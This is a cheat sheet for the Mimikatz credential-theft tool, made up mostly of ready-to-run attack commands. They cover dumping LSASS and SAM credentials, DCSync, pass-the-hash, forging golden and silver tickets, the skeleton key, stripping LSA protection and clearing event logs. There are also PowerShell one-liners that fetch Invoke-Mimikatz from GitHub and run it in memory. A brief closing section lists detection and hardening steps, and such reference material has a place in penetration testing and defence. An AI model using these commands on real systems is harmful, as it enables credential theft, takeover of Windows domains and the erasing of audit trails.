Mimikatz Cheat Sheet
Overview
Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.
⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.
Obtaining Mimikatz
Official Repository
Pre-compiled Binaries
mimikatz.exe - 32-bit executablemimikatz_trunk.zip - Contains both 32-bit and 64-bit executables
Compilation from Source
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
Basic Usage
Running Mimikatz
# Run directly
mimikatz.exe
# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Elevating Privileges
Getting Help
help
<module>::
<module>::<command> /?
Exiting Mimikatz
Core Modules and Commands
sekurlsa Module (LSASS Memory Access)
| Command |
Description |
sekurlsa::logonpasswords |
Extract all logon passwords |
sekurlsa::tickets |
Extract Kerberos tickets |
sekurlsa::ekeys |
Extract Kerberos encryption keys |
sekurlsa::dpapi |
Extract DPAPI master keys |
sekurlsa::credman |
Extract credentials from Windows Credential Manager |
sekurlsa::msv |
Extract MSV authentication information |
sekurlsa::tspkg |
Extract TSPKG authentication information |
sekurlsa::wdigest |
Extract WDigest authentication information |
sekurlsa::kerberos |
Extract Kerberos authentication information |
sekurlsa::ssp |
Extract SSP authentication information |
sekurlsa::livessp |
Extract LiveSSP authentication information |
sekurlsa::cloudap |
Extract CloudAP authentication information |
lsadump Module (SAM and Active Directory)
| Command |
Description |
lsadump::sam |
Extract hashes from the SAM database |
lsadump::secrets |
Extract LSA secrets |
lsadump::cache |
Extract cached domain credentials |
lsadump::dcsync |
Perform DCSync attack to retrieve password data |
lsadump::lsa |
Extract LSA secrets |
lsadump::trust |
Extract domain trust keys |
lsadump::backupkeys |
Extract domain backup keys |
kerberos Module (Ticket Manipulation)
| Command |
Description |
kerberos::list |
List all Kerberos tickets |
kerberos::purge |
Purge all Kerberos tickets |
kerberos::ptt |
Pass-the-ticket (inject a ticket) |
kerberos::golden |
Create a golden ticket |
kerberos::silver |
Create a silver ticket |
kerberos::tgt |
Create a TGT |
kerberos::hash |
Calculate Kerberos keys from password |
crypto Module (Cryptographic Operations)
| Command |
Description |
crypto::certificates |
List certificates |
crypto::keys |
List keys |
crypto::system |
List system certificates |
crypto::capi |
List CAPI certificates |
crypto::cng |
List CNG certificates |
crypto::stores |
List certificate stores |
vault Module (Windows Vault Access)
| Command |
Description |
vault::cred |
List credentials in Windows Vault |
vault::list |
List vault credentials |
token Module (Token Manipulation)
| Command |
Description |
token::whoami |
Display current token information |
token::list |
List all tokens |
token::elevate |
Elevate token privileges |
token::revert |
Revert token |
token::run |
Run a process with a token |
privilege Module (Privilege Management)
| Command |
Description |
privilege::debug |
Enable debug privilege |
privilege::driver |
Load a driver |
event Module (Event Log Management)
| Command |
Description |
event::clear |
Clear event logs |
event::drop |
Drop event logs |
ts Module (Terminal Services)
| Command |
Description |
ts::sessions |
List terminal services sessions |
ts::multirdp |
Enable multiple RDP sessions |
misc Module (Miscellaneous)
| Command |
Description |
misc::cmd |
Command prompt |
misc::regedit |
Registry editor |
misc::taskmgr |
Task manager |
misc::ncroutemon |
Network connection route monitor |
misc::detours |
Detours detection |
misc::skeleton |
Install skeleton key |
Common Attack Techniques
Credential Dumping
privilege::debug
sekurlsa::logonpasswords
privilege::debug
token::elevate
lsadump::sam
Extract Cached Domain Credentials
privilege::debug
lsadump::cache
# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Pass-the-Hash Attacks
Pass-the-Hash with NTLM
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D
Pass-the-Hash with AES Keys
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF
Over-Pass-the-Hash (Convert NTLM to Kerberos)
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe
DCSync Attack
lsadump::dcsync /domain:contoso.local /all
lsadump::dcsync /domain:contoso.local /user:Administrator
lsadump::dcsync /domain:contoso.local /user:krbtgt
Kerberos Ticket Attacks
List Kerberos Tickets
Create a Golden Ticket
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi
Create a Silver Ticket
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi
Pass-the-Ticket
kerberos::ptt golden.kirbi
Purge Tickets
Skeleton Key Attack
privilege::debug
misc::skeleton
Advanced Techniques
LSA Protection Bypass
# Load mimikatz driver
mimidrv::service
# Enable debug privilege
privilege::debug
# Load driver
!+
# Remove LSASS protection
!processprotect /process:lsass.exe /remove
# Extract credentials
sekurlsa::logonpasswords
Remote Operations
# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Extract Domain Backup Keys
lsadump::backupkeys /system:dc01.contoso.local /export
Command Examples with Parameters
sekurlsa::logonpasswords
sekurlsa::logonpasswords [/patch]
sekurlsa::pth
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]
lsadump::dcsync
lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\\\{object-guid\\\\}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
kerberos::golden
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]
kerberos::ptt
kerberos::ptt TICKET_FILE
Defensive Measures
Detection Methods
- Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass.exe
- Monitor for suspicious LSASS memory access
- Monitor for DCSync operations (replication requests from non-DC machines)
- Monitor for ticket creation and manipulation
- Monitor for privilege escalation
Prevention Methods
- Enable LSA Protection (RunAsPPL)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
- Enable Credential Guard (Windows 10/Server 2016+)
- Implement Protected Users group
- Disable WDigest authentication
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
- Implement Just Enough Administration (JEA)
- Regular password rotation
- Limit administrative privileges
- Use strong passwords
Resources